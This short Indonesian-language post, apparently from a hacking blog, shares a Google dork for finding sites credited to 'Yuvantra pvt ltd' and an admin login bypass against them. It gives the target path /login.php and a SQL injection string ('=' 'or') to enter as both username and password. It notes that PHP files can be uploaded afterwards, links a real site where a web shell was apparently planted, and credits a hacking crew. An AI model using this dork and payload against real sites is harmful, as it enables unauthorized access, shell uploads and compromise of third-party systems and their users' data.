Halo bro, pada artikel ini hanya mengulas dork bypass admin. Hanya untuk kenangan, kenangan dia bersamanya :V
Dork: "Design by Yuvantra pvt ltd"
Proof Of Concept :
- Dorking di search enginee( mesin pencari) Google
-Dork "Design by Yuvantra pvt ltd"
-Admin login pada /login.php
Example : http://localhost:8080/login.php
-Login dengan user dan password
user: '=' 'or'
password = '=' 'or'
-Demo:
http://www.yuvantra.com/login.php
-Bisa upload file berekstensi .php .phtml
-Shell uploaded
http://www.yuvantra.com/uploads/students/zaen_umi.php
Thanks to: Purworejo 6etar and Baku Hantam Crew
Link sumber : https://cxsecurity.com/issue/WLB-2019090057
Sekian ulasan dork, terima kasih.
